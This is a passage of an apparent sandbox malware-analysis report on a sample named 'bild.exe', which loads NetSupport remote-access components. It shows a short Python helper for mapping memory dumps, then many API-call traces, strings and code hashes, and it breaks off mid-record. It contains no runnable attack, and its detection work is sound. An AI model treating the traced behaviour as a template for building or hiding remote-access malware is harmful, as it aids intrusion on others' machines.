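    "00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp",
]

if __name__ == "__main__":
    for mod, regs in sorted(group_by_module(SAMPLE_DUMPS).items()):
        print(f"module 0x{mod:X}: image base 0x{image_base(regs):X}, "
              f"{len(code_regions(regs))} executable region(s)")
        for r in regs:
            kind = "MEM_IMAGE" if r.mem_type & MEM_IMAGE else f"0x{r.mem_type:X}"
            print(f"  0x{r.base:08X} {r.protection_name:<22} {kind}")
```

Run against the identifiers above it reports module 0x9 (the submitted file) with image base 0x2D0000 and one executable region at 0x2D1000, and module 0xA with image base 0x11000000 and one executable region at 0x11001000, which is exactly the dump each function record names as its "Source File". Because the field interpretation is inferred, check it against the report's own "Offset" and "based on PE" values before relying on it for a different analysis.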
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                    • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                    • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1314093303-0
                                                                                    • Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                    • Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
                                                                                    • Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                    • Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Public\Videos\Video\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CurrentFileModuleNameProcess
                                                                                    • String ID: C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                    • API String ID: 2251294070-1016564174
                                                                                    • Opcode ID: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                    • Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
                                                                                    • Opcode Fuzzy Hash: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                    • Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 1110F4A9
                                                                                      • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                      • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                      • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                    • _memset.LIBCMT ref: 1110F4D2
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                    • String ID: ..\ctl32\Refcount.cpp
                                                                                    • API String ID: 2803934178-2363596943
                                                                                    • Opcode ID: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                    • Instruction ID: 747f5be640ff5df7f7be77ac0748be8e5b1ae2afb2ba592a3adef8646797d69b
                                                                                    • Opcode Fuzzy Hash: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                    • Instruction Fuzzy Hash: B5E0C23AE4013933C112258A2C03FDBF69C8BD19FCF060021FE0CAA201E586B55181E6
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseCreateFileHandle
                                                                                    • String ID: \\.\NSWFPDrv
                                                                                    • API String ID: 3498533004-85019792
                                                                                    • Opcode ID: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                    • Instruction ID: 0b573536b28af4079515d3142ca801f5deca53cbeb6a996f0a1660ae0aa1d84a
                                                                                    • Opcode Fuzzy Hash: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                    • Instruction Fuzzy Hash: A9D0C971A051387AF23416B66C4CFC7AD09DF06BB5F210264B53DE11D886104C41C2F1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _calloc
                                                                                    • String ID:
                                                                                    • API String ID: 1679841372-0
                                                                                    • Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                    • Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
                                                                                    • Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                    • Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95
                                                                                    APIs
                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                    • __wsplitpath.LIBCMT ref: 11111475
                                                                                      • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
                                                                                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                    • String ID:
                                                                                    • API String ID: 1847508633-0
                                                                                    • Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                    • Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
                                                                                    • Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                    • Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                      • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                      • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                      • Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                      • Part of subcall function 1109E910: EqualSid.ADVAPI32(?,00A1ECC8,?,00000001,00000001), ref: 1109E9A3
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                    • String ID:
                                                                                    • API String ID: 2256153495-0
                                                                                    • Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                    • Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
                                                                                    • Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                    • Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID: ??CTL32.DLL
                                                                                    • API String ID: 1029625771-2984404022
                                                                                    • Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                    • Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
                                                                                    • Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                    • Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92
                                                                                    APIs
                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 11026B6D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DriveType
                                                                                    • String ID: ?:\
                                                                                    • API String ID: 338552980-2533537817
                                                                                    • Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                    • Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
                                                                                    • Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                    • Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791
                                                                                    APIs
                                                                                      • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                    • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                      • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                    Strings
                                                                                    • Error %d Opening regkey %s, xrefs: 110ED1CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpenwvsprintf
                                                                                    • String ID: Error %d Opening regkey %s
                                                                                    • API String ID: 1772833024-3994271378
                                                                                    • Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                    • Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
                                                                                    • Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                    • Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0
                                                                                    APIs
                                                                                    • RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                      • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                    Strings
                                                                                    • Error %d closing regkey %x, xrefs: 110ED17D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Closewvsprintf
                                                                                    • String ID: Error %d closing regkey %x
                                                                                    • API String ID: 843752472-892920262
                                                                                    • Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                    • Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
                                                                                    • Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                    • Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,023CB898,?,?,?,00000100,?,?,00000009), ref: 111463E9
                                                                                      • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HandleLibraryLoadModule
                                                                                    • String ID: NSMTRACE
                                                                                    • API String ID: 4133054770-4175627554
                                                                                    • Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                    • Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
                                                                                    • Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                    • Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID: psapi.dll
                                                                                    • API String ID: 1029625771-80456845
                                                                                    • Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                    • Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
                                                                                    • Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                    • Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID: nslsp.dll
                                                                                    • API String ID: 1029625771-3933918195
                                                                                    • Opcode ID: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                    • Instruction ID: 60eb6736f29bf142f24d4cfcc231741db50fe0cc1946b431100be770a733e412
                                                                                    • Opcode Fuzzy Hash: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                    • Instruction Fuzzy Hash: E7C092B17152388FE3685F7CAC085D2FAE4EB48A91351986EE4B5D3308E6B09C40CFE4
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 11074E1F
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary_memset
                                                                                    • String ID:
                                                                                    • API String ID: 1654520187-0
                                                                                    • Opcode ID: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                    • Instruction ID: 144a06a128bfe4de4bcaa8ee3b5ec3a734aa963de7831f9780c3e5d6e94517af
                                                                                    • Opcode Fuzzy Hash: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                    • Instruction Fuzzy Hash: 6E218376D04228A7D710DA99EC41FEFFBACEB44325F4045AAE909D7200D7315A55CBE1
                                                                                    APIs
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • std::exception::exception.LIBCMT ref: 1105FD93
                                                                                    • __CxxThrowException@8.LIBCMT ref: 1105FDA8
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1338273076-0
                                                                                    • Opcode ID: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                    • Instruction ID: 65be3d9b06008521879bde957bfb15225efad016ffb254945ac63f30ffb56918
                                                                                    • Opcode Fuzzy Hash: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                    • Instruction Fuzzy Hash: F5117FBA900619ABC710CF99C940ADAF7F8FB48614F10862EE91997740E774B900CBE1
                                                                                    APIs
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _malloc_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 1183979061-0
                                                                                    • Opcode ID: 457b307eca14e29342672ca62ef5147d46d8b4d4f126d6aa85e0778cfe473ab4
                                                                                    • Instruction ID: db33143030e4a9298ca15ccbefe9b49d771c33472961b073c023ff9ae0ea679a
                                                                                    • Opcode Fuzzy Hash: 457b307eca14e29342672ca62ef5147d46d8b4d4f126d6aa85e0778cfe473ab4
                                                                                    • Instruction Fuzzy Hash: 98F0F47AE002666F9741CF2C9844896FBDCDF8A158314C4A2E999CB301D671EC0687E0
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 110883EF
                                                                                    • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalInitializeSection_memset
                                                                                    • String ID:
                                                                                    • API String ID: 453477542-0
                                                                                    • Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                    • Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
                                                                                    • Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                    • Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
                                                                                    • ExtractIconExA.SHELL32(?,00000000,0004044D,00040455,00000001), ref: 11144498
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExtractFileIconModuleName
                                                                                    • String ID:
                                                                                    • API String ID: 3911389742-0
                                                                                    • Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                    • Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
                                                                                    • Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                    • Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51
                                                                                    APIs
                                                                                      • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                    • __lock_file.LIBCMT ref: 11163DFE
                                                                                      • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
                                                                                    • __fclose_nolock.LIBCMT ref: 11163E09
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2800547568-0
                                                                                    • Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                    • Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
                                                                                    • Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                    • Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56
                                                                                    APIs
                                                                                      • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                      • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                    • GetLastError.KERNEL32(?,023CB898,000000FF,?), ref: 11144ED5
                                                                                    • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,023CB898,000000FF,?), ref: 11144EE5
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                    • String ID:
                                                                                    • API String ID: 3768737497-0
                                                                                    • Opcode ID: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                    • Instruction ID: cc8fd34c32098476147d622d57126809c91a32baa97f0e350d3592d26a0b2836
                                                                                    • Opcode Fuzzy Hash: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                    • Instruction Fuzzy Hash: 8D110875D4411AEBD7119F94C9C4A6EF3BCEF85A29F200164FC0497A00E775AD11C7A3
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 11010774
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LockitLockit::_std::_
                                                                                    • String ID:
                                                                                    • API String ID: 3382485803-0
                                                                                    • Opcode ID: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                    • Instruction ID: 0f97abe7109b731a14a0a5233c6982db04001c22e931a1e4a38e375530e3522e
                                                                                    • Opcode Fuzzy Hash: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                    • Instruction Fuzzy Hash: D9515D74E00645DFDB04CF98C980AADBBF5BF88318F24829DD5869B385C776E942CB90
                                                                                    APIs
                                                                                    • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                    Memory Dump Source
